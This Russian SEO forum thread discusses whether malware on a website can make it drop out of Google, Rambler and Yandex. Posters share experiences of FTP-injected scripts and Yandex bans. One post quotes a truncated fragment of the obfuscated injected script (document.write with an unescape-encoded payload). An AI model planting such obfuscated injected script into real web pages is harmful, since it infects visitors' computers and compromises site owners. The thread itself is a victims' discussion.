Падение в выдаче из-за вирусов. Возможно?

12
V
На сайте с 19.07.2006
21
1471

Разговаривала только что с потенциальным партнером - владельцем интернет-магазина.

Она мне пожаловалась, что злые конкуренты 3 недели назад устроили на сайт массированную вирусную атаку, после чего сайт последовательно выпал сначала из Гугла, потом из Рамблера, а в последний ап и из Яндекса.

Ее оптимизатор уверяет, что это все из-за поселившихся на сайте вирусов и что он сейчас предпринимает попытки закрыть дыры.

Честно говоря, я о таком слышу впервые... Что, правда вирусы могут повлиять на выдачу? Или это отмазки оптимизатора?

P.S. - вообще забавно уже то, что 3 недели нельзя вычистить вирусы с сайта... Но ведь держал же он ее длительное время в топе...:confused::rolleyes:

Всегда интересны ссылки мебельной тематики
K
На сайте с 31.01.2001
737

Какая-то чушь. Кто-то непрофессионально делает свою работу и парит мозг владельцу. Ну, а владелец сайта позволяет парить себе мозг. Как минимум, желательно сюда написать адрес сайта, раз уж вы обратились. А независимые эксперты посмотрят и скажут более конкретно, что происходит на самом деле, квалифицированных людей здесь много.

Vesta:
это все из-за поселившихся на сайте вирусов и что он сейчас предпринимает попытки закрыть дыры.

Скорее всего вирусы на сайте просто так "поселиться" не могут. Вот если компьютер человека, который имеет доступ к сайту затроянен, то доступ к сайту сможет получить злоумышленник и уже с его помощью сделать на сайте все, что угодно, например повесить запрещающий /robots.txt. В таком случае сайт вылетит из всех поисковиков (со временем).

Давайте адрес сайта сюда.

Выделенные полосы в Москве (http://www.probkovorot.info) привели к снижению скорости до 23%.
Goword
На сайте с 21.04.2007
126

Vesta, интересно.... Первый раз такое слышу!

V
На сайте с 19.07.2006
21
Kost:
Скорее всего вирусы на сайте просто так "поселиться" не могут. Вот если компьютер человека, который имеет доступ к сайту затроянен, то доступ к сайту сможет получить злоумышленник и уже с его помощью сделать на сайте все, что угодно, например повесить запрещающий /robots.txt.

Да, но никто не говорит о взломе сайта - тогда бы и вопроса не было. Формулировка такая "из-за того, что на сайте вирусы".

Урл дать не могу, т.к. сайт не мой. Интересовала просто теоретическая возможность такого явления...

K
На сайте с 31.01.2001
737

Чисто теоретически - возможно все, особенно при наличии человеческого фактора.

А поскольку ни одного бита конкретной информации вы не предоставили, вы получите в ответ ничуть не больше, только зря сотрясали кнопки на клавиатуре.

Fat Bear
На сайте с 01.12.2006
264
Kost:
Давайте адрес сайта сюда

Да, очень интересно посмотреть.

С помощью вирусов чисто теоретически можно понизить посещаемость сайта, но понизить сайт в выдаче... в общем интересно посмотреть :)

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
IS
На сайте с 16.08.2006
160

Есть пример интернет-магазина, на сайте которого вирусы (через фрейм), но это не мешает ему занимать лидирующую десятку по пусть и не высокочастотному запросу. Как в Гугле так и Яндексе.

Р.S. И ему и хостеру сообщал - но мер принято не было. Может, вирусы не те? :)

T
На сайте с 17.07.2007
11

Я сталкивался с похожей ситуацией. В сайт был внедрён вирус (скорее всего через ftp) и в результате сайт был Яндексом забанен именно за вирус. После удаления вируса и переписки с Яндексом сайт вернули в поиск.

P.S. Несколько месяцев назад этот вирус вновь появился в сети и теперь заражённые компы за какой-то своей вирусной надобностью обращаются на этот домен и в результате я имею на счётчике пустого сайта 2000-3000 посетителей :).

Тротуарная плитка, пеноблоки (http://www.evrocontract.ru)
SA
На сайте с 12.02.2006
142

а может под вирусной атакой ддос подразумевался и сайт лежит?? тогда все логично :)

[Удален]

Вы бы урл огласили - так всем понятнее будет и сразу найдете ответ на свой вопрос, а не гадания на гуще.

seo-alex:
а может под вирусной атакой ддос подразумевался и сайт лежит?? тогда все логично :)

нет не ДДОС

Была похожая ситуация с несколькими проектами:

- при заходе на вредоносный урл, троян попадал на компьютер;

- при работе с фтп в индексный файл прописывался скрипт вида

<!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7Bfunction%20xrF%28vnK%29%7Breturn%20parseInt......... ..........Z7Z9ZgZIZHZkZFVlZyZ5ZyZoZ7ZCZwVVZkZSZNZSZNZkZLZYZXZoZwZlZXZ7ZYZ9VrZLZYZ6ZZZhZ

- касперский ругается, что делает скрипт - не знаю, но из-за него лично у меня потерялось многое (зашел без касперского пару раз)

- восстанавливал индексные страницы путем захода на сайт с другого чистого компьютера, впуская вирус, копируя код и удаляя из него сам код скрипта, потом высылая по почте на рабочий и восстанавливая индекс.

PS: из индекса все повылетали

A
На сайте с 08.04.2006
49
Track:
Я сталкивался с похожей ситуацией. В сайт был внедрён вирус (скорее всего через ftp) и в результате сайт был Яндексом забанен именно за вирус.

Тоже был такой случай, сайт забанили по жалобе пользователей.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий